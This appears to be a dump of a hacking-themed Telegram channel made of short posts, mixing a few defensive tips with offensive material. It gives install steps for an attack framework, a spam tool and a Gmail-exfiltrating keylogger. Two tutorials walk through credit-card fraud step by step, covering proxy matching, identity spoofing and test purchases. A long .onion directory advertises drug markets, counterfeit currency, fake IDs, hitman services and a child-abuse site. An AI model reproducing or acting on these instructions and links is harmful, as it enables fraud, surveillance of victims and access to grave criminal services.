UNDERCODE COMMUNITY
2.68K subscribers
1.23K photos
31 videos
2.65K files
80.1K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Hakku Framework penetration testing
>Hakku is simple framework that has been made for penetration testing tools. Hakku framework offers simple structure, basic CLI, and useful features for penetration testing tools developing. Hakku is on early stages and may be unstable, so please download the released versions from github or sourceforge, don't just clone github repository except you don't want stability, you want to try out latest features, or you just want to develop Hakku. Hakku is under MIT license, in other words you can do what you ever want with the source code

πŸ¦‘FEATURES :

apache_users
arp_dos
arp_monitor
arp_spoof
bluetooth_pod
cloudflare_resolver
dhcp_dos
dir_scanner
dns_spoof
email_bomber
hostname_resolver
mac_spoof
mitm
network_kill
pma_scanner
port_scanner
proxy_scout
whois
web_killer
web_scout
wifi_jammer
zip_cracker
rar_cracker
wordlist_gen

πŸ¦‘ π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„• :

1) git clone https://github.com/4shadoww/hakkuframework

2) cd hakkuframework

3) Hakku doesn't require installation, but if want to do it for some reason you can do it using installation script. That same script will be used to uninstall Hakku

> Installation can be done by simple running command: sudo ./install -i

> use for learn not for harm :(
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘updated Contains Spammers Tools With Various Types With High Limit Even Unlimited indonisian script πŸ‘πŸ»

πŸ¦‘ π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„• :

$ pkg update upgrade
$ pkg install git python2 toilet figlet php
$ git clone https://github.com/4L13199/LITESPAM
$ cd LITESPAM

> termux-linux
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ How to recover A DISABLED INSTAGRAM ACCOUNT ? from official instagram team
t.me/UndercodeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) If your Instagram account was disabled, you’ll see a message telling you when you try to log in. Accounts that don't follow Community Guidelines
> https://help.instagram.com/477434105621119

or Terms of Use may be disabled without warning. We suggest that you review the Community Guidelines carefully along with the posts on all accounts you've created. Keep in mind, we may permanently remove an account that repeatedly violates the Community Guidelines or Terms of Use.

2) If you think your account was disabled by mistake, you may be able to appeal the decision by opening the app, entering your username and password and following the on-screen instructions.

3) If you don’t see a disabled message, you may be experiencing a login issue. If your account was deleted by you or someone with your password, there's no way to restore it. You can create a new account with the same email address you used before, but you may not be able to get the same username.

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Generate Gmail Emailing Keyloggers to Windows :)
fb.com/undercodeTesting

πŸ¦‘ π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„• :

1) git clone https://github.com/4w4k3/BeeLogger.git

Running:
2) cd BeeLogger

3) sudo su

4) chmod +x install.sh

5) ./install.sh

6) python bee.py

πŸ¦‘Features :

> Send logs each 120 seconds.

> Send logs when chars > 50.

> Send logs with GMAIL.

> Some Phishing methods are included.

> Multiple Session disabled.

> Auto Persistence.

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘ any doubt feel free to ask us :)
@Undercode_Testing
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Is the phone hacked? How to find out and what to do if fears are confirmed ? by Undercode :
t.me/undercodeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

Hacking signs

1) battery charge. If the smartphone’s battery began to run down quickly, reducing the device’s operating time by several hours under normal use, then this most likely indicates the operation of malicious background applications;

2) applications. The appearance in the general list of new application icons that were not installed by you may indicate that the device was hacked;
notifications. Displaying strange messages on the screen with unreadable characters, links or notifications about the execution of the request, if you did not put your hand to this, also does not bode well - for sure, hackers already have your data;


3) balance. If your mobile account incurs losses, although you are convinced that you did not call toll numbers, did not order additional services and were not involved in any financial transactions, then you can say with accuracy that your gadget is hacked;

4) malfunctions. Strange signals during a conversation, extraneous noise, or even disconnection with a good signal level can also talk about using the device’s microphone or even listening to conversations;

Written by Undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Best Jailbreak :

iOS 12.4
Jailbreak using unc0ver


Semi-Untethered Only. Follow the Cydia Impactor method of installing the Jailbreak.

iOS 12.1.3 β†’ 12.2
Jailbreak using Chimera


Semi-Untethered Only. Follow the Cydia Impactor method of installing the Jailbreak. A12 devices are not supported. Sileo installed by default (not Cydia).

iOS 12.0 β†’ 12.1.2
Jailbreak using Chimera


Semi-Untethered Only. Follow the Cydia Impactor method of installing the Jailbreak. Sileo installed by default (not Cydia).

iOS 11.0 β†’ 12.2
Jailbreak using unc0ver


Semi-Untethered Only. Follow the Cydia Impactor method of installing the Jailbreak.

iOS 10.0 β†’ 10.3.3
Jailbreak using Meridian


Semi-Untethered Only. Follow the Cydia Impactor method of installing the Jailbreak.

iOS 10.0 β†’ 10.3.4
Jailbreak using doubleH3lix


64-bit devices with a headphone jack supported. Semi-untethered only. Follow the Cydia Impactor method of installing the Jailbreak.

iOS 10.0 β†’ 10.3.4
Jailbreak using H3lix


32-bit devices only. Semi-untethered only. Follow the Cydia Impactor method of installing the Jailbreak.

iOS 9.3.5 β†’ 9.3.6
Jailbreak using PhΕ“nix


32-bit devices only. Semi-untethered only. Follow the Cydia Impactor method of installing the Jailbreak.

iOS 9.1 β†’ 9.3.4
Jailbreak using Jailbreak.me

32-bit devices only. Visit jailbreak.me in Safari on the iOS device itself.

iOS 9.1 β†’ 9.3.4
Jailbreak using Home Depot


32-bit devices only. Semi-untethered, but can be untethered by installing UntetherHomeDepot via tihmstar's Cydia repo. Follow the Cydia Impactor method of installing the Jailbreak.

iOS 9.2 β†’ 9.3.3
Jailbreak using Pangu


64-bit devices only. Semi-untethered only. Follow the Cydia Impactor method of installing the Jailbreak.

iOS 9.0 β†’ 9.1
Jailbreak using Pangu


iOS 9.1 Jailbreak is for 64-bit devices only.

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
# Join if you only interested in iOs

T.me/iUNDERCODE
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ How to quickly help a hacked phone by Undercode :
t.me/undercodeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) Check for viruses. More often than not, data from mobile devices falls into the hands of hackers through malware, and simply put, viruses that transmit information from a device directly to an attacker. "Infection" most often occurs when downloading applications from unreliable sources.

2) The easiest way to find out if there are viruses on your smartphone is to check it with an antivirus , i.e. a program that detects and removes viruses.

3) Check battery usage statistics. The battery charge should be consumed in direct proportion to the use of the smartphone. You can track which applications consume a charge (including in the background) in the β€œEnergy consumption” section of the device.

4) On Samsung Galaxy, you can check the battery consumption statistics through the "Device Maintenance> Battery" section. Android will offer to transfer energy-consuming applications to sleep mode.

5) We remove suspicious and hidden applications . The presence of a large number of applications cannot be called useful for any gadget, and the presence of malicious ones is definitely harmful. Therefore, remove suspicious applications from your smartphone, and then install them from official markets and pay attention to what permissions you provide for work.

6) Check the statistics of the use of mobile traffic on the phone: (Settings> Connections> Data Usage). If you have the habit of not disconnecting the mobile Internet, check the data transfer statistics to track the suspicious activity of the device.

7) We use only reliable Wi-Fi access points. Do not use public Wi-Fi points to enter payment customers, make bank transfers and any other financial transactions. Public networks are poorly protected, and there is a risk of connecting to a hacker network, through which your data will fall into the hands of attackers. It will not be superfluous to completely disable automatic connection.

8)we update the phone to the latest version (Settings> Software update> Download and installation> Download). Do not ignore system alerts about a new version of the operating system. This is to increase security and combat updated threats. Believe me, it’s better to spend half an hour installing the new version of Android and rebooting the gadget, than to eliminate the consequences of hacking.

9) We check the credit card account - are there any suspicious charges. Using mobile payment systems is very convenient, but tying the card to a smartphone is very risky. If you don’t want to give up comfort, and security is compromised, then contact your bank and request a transaction history. If there are suspicious transactions - take measures up to blocking the old account and opening a new one.

10) The last method is to make a Hard Reset on the phone, after making a backup copy of important data. If the methods used are ineffective or you fear that you could not completely eliminate the threat, then it is worth returning the device to its factory state by making a Hard Reset of the smartphone. Resetting all settings affects all data, including user data, so it is better to save important contacts, photos, notes and other information in advance to third-party media. After resetting the settings, you will receive the gadget β€œout of the box”, which means you will have to re-configure it for yourself.

11) This method is the most radical, because it allows you to completely remove all third-party applications, but it can also be useless if you do not take care of protecting your accounts in advance by changing passwords to new ones.

Written by Undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘CARDING TUTORIALS :
t.me/undercodeTesting



πŸ¦‘ Types of Credit Cards:

1) After getting the CC, I recommend checking whether the CC is live or dead with this tool: Credit Card Verifier
Regular Credit Card :

Β· NAME:

Β· ADDRESS:
Β· CITY:
Β· STATE:
Β· ZIP CODE:
Β· TEL. BILLING NUMBER:
Β· CARD NUMBER:
Β· CARD EXP DATE:
Β· CVV CODE:

2) Well, this is the minimum information you’ll get from a CC whenever you’ll buy it. If you don’t get any of these details, then you can’t do anything with that CC. You are out of luck this time. With this CC you can card simple sites.

πŸ¦‘ Partial Full-Info CC

In these Cards, you will get some additional information with the details mentioned above. This Information is:


Β· Social Security Number (SSN):
Β· Date Of Birth (DOB):
Β· ******’s Maiden Name (MMN):

4) with the help of this info, you can even card C2IT and even PayPal. So this is Great if you’ll get these Details too.
Full-Info Credit Card

πŸ¦‘ This Card provides you full Details in it. These details are below
Β· BANK ACCOUNT NUMBER:
Β· ROUTING NUMBER:
Β· BANK NAME:
Β· BANK NUMBER:
Β· DRIVERS LICENSE NUMBER:
Β· PIN NUMBER (For CC or ATM card)

5) If you’ll have this info, you can card anything. Yes, I said anything.
Below are some of the Companies, which provide credit cards. I must suggest you use AMEX Premium, as it has mainly usage by many of the carders.

These companies are
Β· AMEX
Β· VISA
Β· DISCOVER
Β· MasterCard


▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Carding for beginers :

BIN - What is It?

πŸ¦‘ BIN Stands for Bank Identification Number, It’s the first 6 digits of your credit card, suppose your Credit card number is 4305873969346315, then your BIN will be 430587. I will suggest you collect some information related to BIN, this may help you in learning carding easily. For BIN’s BinsBase, Bins.su and BinLists are the best. This will help you in learning almost everything about Bins.


1) Well, before starting make sure you have gathered all the required things I earlier mentioned in the post. For the links of software download and purchase see the end of post.
Set Up Socks in Mozilla

2) Just open Firefox, then go to Options and Click on General on the left pane of the browser. Then scroll down to the Network Settings section and click on Settings. A Pop-Up will appear. Select the fourth option of Manual Proxy Configuration. Now type the proxy and port below, that’s it!

3) After adding the Proxy there, Just Hit OK and restart Firefox and now you’ll be connected with secure socks.

> Note: Make Sure to Buy Socks with the Matching Location of the Address in credit card. Suppose that the credit card holder is from South Africa, your socks are also supposed to be for South Africa.


πŸ¦‘ SO HOW TO USE BINS :


1) Create a new Email account with the matching name of CC holder. If CC holder’s name is Smith Parker then make something like Smithparker78@***.com
Note: Never use disposable Emails for carding.

2) Run RDP and connect with your Host, in case you are not using RDP, follow the steps below-

3)Change all the MAC addresses using MAC Address Changer.

4) Clear all the history of your PC including Cache, Temp Files using CC Cleaner.

5)Set up sock5 in Mozilla Firefox, check above I have explained how to setup socks in Mozilla.

6) Now, restart your browser and visit This link to check if your IP has changed with the location of CC holder or not.


7) Open any local online market store, I will suggest you use anyone which is from your own country.

8)Register a new account with the name of CC holder and Email you made for carding.

9) Try to add an item to your cart, the item should below USD $500, never use big orders for the first transaction.

10) In shipping address, add the address where you want to deliver the product.

11) Now, go for the payment option, choose credit card for payment.

12) Enter all the credit card details you received when you bought the credit card.

13) For the Billing address, use the address of CC Holder.

POWERED BY wiki
@UNDERCODETESTING
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Types of Attacks against Web Servers :
t.me/undercodeTesting

1) Directory traversal attacks– This type of attacks exploits bugs in the web server to gain unauthorized access to files and folders that are not in the public domain. Once the attacker has gained access, they can download sensitive information, execute commands on the server or install malicious software.

2) Denial of Service Attacks– With this type of attack, the web server may crash or become unavailable to the legitimate users.
Domain Name System Hijacking – With this type of attacker, the DNS setting are changed to point to the attacker’s web server. All traffic that was supposed to be sent to the web server is redirected to the wrong one.

3) Sniffing– Unencrypted data sent over the network may be intercepted and used to gain unauthorized access to the web server.

4) Phishing– With this type of attack, the attack impersonates the websites and directs traffic to the fake website. Unsuspecting users may be tricked into submitting sensitive data such as login details, credit card numbers, etc.

5) Pharming– With this type of attack, the attacker compromises the Domain Name System (DNS) servers or on the user computer so that traffic is directed to a malicious site.

6) Defacement– With this type of attack, the attacker replaces the organization’s website with a different page that contains the hacker’s name, images and may include background music and messages.

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Tool designed to help identify incorrectly configured Django applications that are exposing sensitive information.
t.me/undercodeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

> Requirements
Shodan
Pyfiglet
Requests
BeautifulSou

πŸ¦‘ π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„• :

1) git clone https://github.com/hackatnow/djangohunter

2) cd djangohunter

3) Usage: python3 djangohunter.py --key {shodan}
Dorks: 'DisallowedHost',

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘How to Use with stand-alone player on your website
Download asciinema player from player's releases page (you only need .js and .css file), then use it like this:

<html>
<head>
<link rel="stylesheet" type="text/css" href="/asciinema-player.css" />
</head>
<body>
<asciinema-player src="/210648.cast" cols="80" rows="24"></asciinema-player>
...
<script src="/asciinema-player.js"></script>
</body>
</html>

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ 2020 DEEPWEBSITES ONLINE > 7/24
24/24

To browse .onion Deep Web links, install Tor Browser from http://torproject.org/
Hidden Service lists and search engines
http://3g2upl4pq6kufc4m.onion/ – DuckDuckGo Search Engine
http://zqktlwi4fecvo6ri.onion/wiki/index.php/Main_Page – Uncensored Hidden Wiki
http://idnxcnkne4qt76tg.onion/ – Tor Project: Anonymity Online
http://torlinkbgs6aabns.onion/ – TorLinks
http://jh32yv5zgayyyts3.onion/ – Hidden Wiki .Onion Urls
http://wikitjerrta4qgz4.onion/ – Hidden Wiki – Tor Wiki
http://xdagknwjc7aaytzh.onion/ – Anonet Webproxy
http://2vlqpcqpjlhmd5r2.onion/ – Gateway to Freenet
http://nlmymchrmnlmbnii.onion/ – Is It Up?
http://wiki5kauuihowqi5.onion/ – Onion Wiki – 650+ working 05.2017 deep web links
http://j6im4v42ur6dpic3.onion/ – TorProject Archive
http://p3igkncehackjtib.onion/ – TorProject Media
http://kbhpodhnfxl3clb4.onion – Tor Search
http://cipollatnumrrahd.onion/ – Cipolla 2.0 (Italian)
Marketplace Financial
http://torbrokerge7zxgq.onion/ – TorBroker – Trade securities anonymously with bitcoin, currently supports nearly 1000 stocks and ETFs
http://fogcore5n3ov3tui.onion/ – Bitcoin Fog – Bitcoin Laundry
http://2vx63nyktk4kxbxb.onion/ – AUTOMATED PAYPAL AND CREDIT CARD STORE
http://samsgdtwz6hvjyu4.onion – Safe, Anonymous, Fast, Easy escrow service.
http://easycoinsayj7p5l.onion/ – EasyCoin – Bitcoin Wallet with free Bitcoin Mixer
http://jzn5w5pac26sqef4.onion/ – WeBuyBitcoins – Sell your Bitcoins for Cash (USD), ACH, WU/MG, LR, PayPal and more
http://ow24et3tetp6tvmk.onion/ – OnionWallet – Anonymous Bitcoin Wallet and Bitcoin Laundry
http://qc7ilonwpv77qibm.onion/ – Western Union Exploit
http://3dbr5t4pygahedms.onion/ – ccPal Store
http://y3fpieiezy2sin4a.onion/ – HQER – High Quality Euro Replicas
http://qkj4drtgvpm7eecl.onion/ – Counterfeit USD
http://nr6juudpp4as4gjg.onion/pptobtc.html – PayPal to BitCoins
http://nr6juudpp4as4gjg.onion/doublecoins.html – Double Your BitCoins
http://lw4ipk5choakk5ze.onion/raw/4588/ – High Quality Tutorials
Marketplace Commercial Services
http://6w6vcynl6dumn67c.onion/ – Tor Market Board – Anonymous Marketplace Forums
http://wvk32thojln4gpp4.onion/ – Project Evil
http://5mvm7cg6bgklfjtp.onion/ – Discounted electronics goods
http://lw4ipk5choakk5ze.onion/raw/evbLewgkDSVkifzv8zAo/ – Unfriendlysolution – Legit hitman service
http://nr6juudpp4as4gjg.onion/torgirls.html – Tor Girls
http://tuu66yxvrnn3of7l.onion/ – UK Guns and Ammo
http://nr6juudpp4as4gjg.onion/torguns.htm – Used Tor Guns
http://ucx7bkbi2dtia36r.onion/ – Amazon Business
http://nr6juudpp4as4gjg.onion/tor.html – Tor Technology
http://hbetshipq5yhhrsd.onion/ – Hidden BetCoin
http://cstoreav7i44h2lr.onion/ – CStore Carded Store
http://tfwdi3izigxllure.onion/ – Apples 4 Bitcoin
http://e2qizoerj4d6ldif.onion/ – Carded Store
http://jvrnuue4bvbftiby.onion/ – Data-Bay
http://bgkitnugq5ef2cpi.onion/ – Hackintosh
http://vlp4uw5ui22ljlg7.onion/ – EuroArms
http://b4vqxw2j36wf2bqa.onion/ – Advantage Products
http://ybp4oezfhk24hxmb.onion/ – Hitman Network
http://mts7hqqqeogujc5e.onion/ – Marianic Technology Services
http://mobil7rab6nuf7vx.onion/ – Mobile Store
http://54flq67kqr5wvjqf.onion/ – MSR Shop
http://yth5q7zdmqlycbcz.onion/ – Old Man Fixer’s Fixing Services
http://matrixtxri745dfw.onion/neo/uploads/MATRIXtxri745dfwONION_130827231336IPA_pc.png – PC Shop
http://storegsq3o5mfxiz.onion/ – Samsung StorE
http://sheep5u64fi457aw.onion/ – Sheep Marketplace
http://nr6juudpp4as4gjg.onion/betcoin.htm – Tor BetCoin
http://qizriixqwmeq4p5b.onion/ – Tor Web Developer
http://vfqnd6mieccqyiit.onion/ – UK Passports
http://en35tuzqmn4lofbk.onion/ – US Fake ID Store
http://xfnwyig7olypdq5r.onion/ – USA Citizenship
http://uybu3melulmoljnd.onion/ – iLike Help Guy
http://dbmv53j45pcv534x.onion/ – Network Consulting and Software Development
http://lw4ipk5choakk5ze.onion/raw/4585/ – Quick Solution (Hitman)
http://nr6juudpp4as4gjg.onion/tynermsr.htm – Tyner MSR Store
Marketplace Drugs
http://rso4hutlefirefqp.onion/ – EuCanna – Medical Grade Cannabis Buds, Rick Simpson Oil, Ointments and Creams
http://newpdsuslmzqazvr.onion/ – Peoples Drug Store – The Darkweb’s Best Online Drug Supplier!
http://smoker32pk4qt3mx.onion/ – Smokeables – Finest Organic Cannabis shipped from the USA
http://fzqnrlcvhkgbdwx5.onion/ – CannabisUK – UK Wholesale Cannabis Supplier
http://kbvbh4kdddiha2ht.onion/ – DeDope – German Weed and Hash shop. (Bitcoin)
http://s5q54hfww56ov2xc.onion/ – BitPharma – EU vendor for cocaine, speed, mdma, psychedelics and subscriptions
http://ll6lardicrvrljvq.onion/ – Brainmagic – Best psychedelics on the darknet
http://25ffhnaechrbzwf3.onion/ – NLGrowers – Coffee Shop grade Cannabis from the netherlands
http://fec33nz6mhzd54zj.onion/index.php – Black Market Reloaded Forums
http://atlmlxbk2mbupwgr.onion/ – Atlantis Marketplace Forums
http://atlantisrky4es5q.onion/ – Atlantis Marketplace
http://dkn255hz262ypmii.onion/ – Silk Road Forums
http://4yjes6zfucnh7vcj.onion/ – Drug Market
http://k4btcoezc5tlxyaf.onion/ – Kamagra for BitCoins
http://silkroadvb5piz3r.onion/silkroad/home – Silk Road Marketplace
http://5onwnspjvuk7cwvk.onion/ – Black Market Reloaded
Hosting
http://matrixtxri745dfw.onion/ – Image Uploader
http://lw4ipk5choakk5ze.onion/ – PasteThis – Tor based Pastebin
http://wzrtr6gpencksu3d.onion:8080/ – Gittor
http://nr6juudpp4as4gjg.onion/ – Free hosting
http://tklxxs3rdzdjppnl.onion/ – Liberty’s Hackers Hosting Service
http://matrixtxri745dfw.onion/ – Matrix Trilogy
Blogs
http://74ypjqjwf6oejmax.onion/ – Beneath VT – Exploring Virginia Tech’s Steam Tunnels and Beyond
http://76qugh5bey5gum7l.onion/ – Deep Web Radio
http://edramalpl7oq5npk.onion/Main_Page – Encyclopedia Dramatica
http://ih4pgsz3aepacbwl.onion/ – Hushbox
http://ad52wtwp2goynr3a.onion/# – Dark Like My Soul
http://tns7i5gucaaussz4.onion/ – FreeFor
http://gdkez5whqhpthb4d.onion/ – Scientology Archive
http://newsiiwanaduqpre.onion/ – All the latest news for tor
http://5vppavyzjkfs45r4.onion/ – Michael Blizek
http://7ueo7ahq2xlpwx7q.onion/ – AYPSELA News
http://7hk64iz2vn2ewi7h.onion/ – Blog about Stories
http://tigas3l7uusztiqu.onion/ – Mike Tigas
http://mpf3i4k43xc2usxj.onion/ – Sam Whited
http://7w2rtz7rgfwj5zuv.onion/ – An Open Letter to Revolutionaries
http://3c3bdbvhb7j6yab2.onion/ – Totse 2
http://4fvfamdpoulu2nms.onion/ – Lucky Eddie’s Home
http://nwycvryrozllb42g.onion/searchlores/index.htm – Fravia’s Web Searching Lore
http://newsiiwanaduqpre.onion/ – OnionNews – Blog about the onionland
Forums and Chans
http://2gxxzwnj52jutais.onion/phpbb/index.php – Onion Forum 2.0 renewed
http://3fyb44wdhnd2ghhl.onion/ib/ – Onii-Chan
http://bx7zrcsebkma7ids.onion – Jisko
http://npdaaf3s3f2xrmlo.onion/ – Twitter clone
http://jv7aqstbyhd5hqki.onion – HackBB – Hacking & cracking forum
http://xdagknwjc7aaytzh.onion/20/http/1.4.7.9/forummain.htm – Read only access to the Freenet FMS forums via the Anonet Webproxy
http://sbforumaz7v3v6my.onion/ – SciBay Forums
http://kpmp444tubeirwan.onion/ – DeepWeb
http://r5c2ch4h5rogigqi.onion/ – StaTorsNet
http://hbjw7wjeoltskhol.onion – The BEST tor social network! File sharing, messaging and much more. Use a fake email to register.
http://t4is3dhdc2jd4yhw.onion/ – OnionForum 3.0 – New Onionforum for general talk, now with marketplace
http://zw3crggtadila2sg.onion/imageboard/ – TorChan – One of the oldest chans on Tor
Email and Messaging
http://bitmailendavkbec.onion – swiss email
http://365u4txyqfy72nul.onion/ – Anonymous E-mail sevice. You can only communicate with other users currently using this service. So tell all your friends about it!
http://sms4tor3vcr2geip.onion/ – SMS4TOR – Self destructing messages
http://notestjxctkwbk6z.onion/ – NoteBin – Create encrypted self-destructing notes
http://torbox3uiot6wchz.onion/ – [TorBox] The Tor Mail Box
http://u6lyst27lmelm6oy.onion/index.php – Blue matrix chat NOT UP ALL THE TIME so chek often to see when it is
http://wi7qkxyrdpu5cmvr.onion/ – Autistici/Inventati
http://u4uoz3aphqbdc754.onion/ – Hell Online
Political
http://6sgjmi53igmg7fm7.onion/index.php?title=Main_Page – Bugged Planet
http://faerieuaahqvzgby.onion/ – Fairie Underground
http://2r2tz6wzqh7gaji7.onion/ – Kavkaz Center
http://tnysbtbxsf356hiy.onion/ – The New Yorker Strongbox
http://duskgytldkxiuqc6.onion/ – Example rendezvous points page
http://rrcc5uuudhh4oz3c.onion/ – The Intel Exchange Forum :: Information and discussion on various topics, ranging from Illegal Activities and Alternative Energy, to Conspiracy Theories and Hacking. Same people from SnapBBS on a fully secure, moderated and categorized forum.
http://opnju4nyz7wbypme.onion/weblog/index.html – A7B blog :: a blog dedicated to the restoration of a limited constitutional republic in the USA
http://assmkedzgorodn7o.onion/ – Anonymous, safe, secure, crowdfunded assassinations.
http://duskgytldkxiuqc6.onion/comsense.html – Commo Sense by Thomas Paine
http://nwycvryrozllb42g.onion/ – Destination Unknown
http://zbnnr7qzaxlk5tms.onion/ – Wiki Leaks
Hacking
http://salted7fpnlaguiq.onion/ – SALT
http://yj5rbziqttulgidy.onion/ – Itanimulli
http://bbxdfsru7lmmbj32.onion/marketplace/ – Delta Initiative
http://2ogmrlfzdthnwkez.onion/ – Rent-A-Hacker
Warez
http://2gxxzwnj52jutais.onion/ – The Nowhere Server (restored from backup after FH)
http://jntlesnev5o7zysa.onion/ – The Pirate Bay – Torrents
http://am4wuhz3zifexz5u.onion/ – Tor Library – library of books and other media files
http://uj3wazyk5u4hnvtk.onion/ – The Pirate Bay – Torrents (official .onion)
http://doxbindtelxceher.onion/ – DOXBIN
http://wuvdsbmbwyjzsgei.onion/ – Music Downloads
http://lolicore75rq3tm5.onion/ – Lolicore and Speedcore Music
http://xfmro77i3lixucja.onion/ – ebooks
http://vt27twhtksyvjrky.onion/ – lol 20th Century Western Music Recordings and Scores
http://2ygbaoezjdmacnro.onion/ – Pony at Noisebridge
http://xfmro77i3lixucja.onion/ – Imperial Library of Trantor
http://c3jemx2ube5v5zpg.onion/ – Jotunbane’s Reading Club
Drugs Non-commercial
No links found.

Erotic 18+
http://tklxxs3rdzdjppnl.onion/sharepass/ – SharePass – Password sharing community
http://k4jmdeccpnsfe43c.onion/ – Girls Released – Some nice model pics
http://54dgeda4ik6iypui.onion/ – Gallery – Met-Art, FTVX etc sets
http://pinkmethuylnenlz.onion/ – The Pink Meth (mirror)
http://2fqgjzbb2h7yevom.onion/klixen/ – Klixen
http://orsxvca7glswueo7.onion/ – EroDir – Lots and lots of Hentai
http://mmgh3rqeswrlgzdr.onion/ – VOR-COM
Erotic Hard Candy
Hard candy links no longer working and removed.

Erotic Jailbait


Non-English
http://germanyhusicaysx.onion – Deutschland im Deep Web – German forum
http://ffi5v46ttwgx3fby.onion/ – Das ist Deutschland hier 2.0 – German Board
http://paisleli66axejos.onion/ – PAIS
http://hyjmkmb3lfymiprp.onion/hen/papieze/ – DzieciΔ™ca pedofilia
http://runionv62ul3roit.onion/ – Russian Onion Union
http://s6cco2jylmxqcdeh.onion/ – ?ltimos bumps
http://5xki35vc4g5ts6gc.onion – GTF Greek Tor Forum . For greek speaking users
http://cipollatnumrrahd.onion/index.php – Cipolla 2.0 – Italian Community
http://runionv62ul3roit.onion – Russian community: market and anonymous talks about security, guns etc.
http://ptrackcp2noqu5fh.onion/ – PoliceTrack – Ne vous faites plus suivre par la police.
http://amberoadychffmyw.onion – Amberoad – russian anonymous market
http://r2d2akbw3jpt4zbf.onion – R2D2 – russian anonymous market
http://ramp2bombkadwvgz.onion – RAMP – biggest russian market (drugs only)
http://szmyt4v4vjbnxpg3.onion/ – Блавянский
http://o2tu5zjxjlibrary.onion/ – Bibliotheca Alexandrina
http://xzzpowtjlobho6kd.onion/wordpress/ – DeepBlog
http://zqiirytam276uogb.onion/ – Thorlauta
http://ocbh4hoqs37unvv6.onion – French Deep Web



▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘let s send Carding Tutorials FOR LEARNING !! :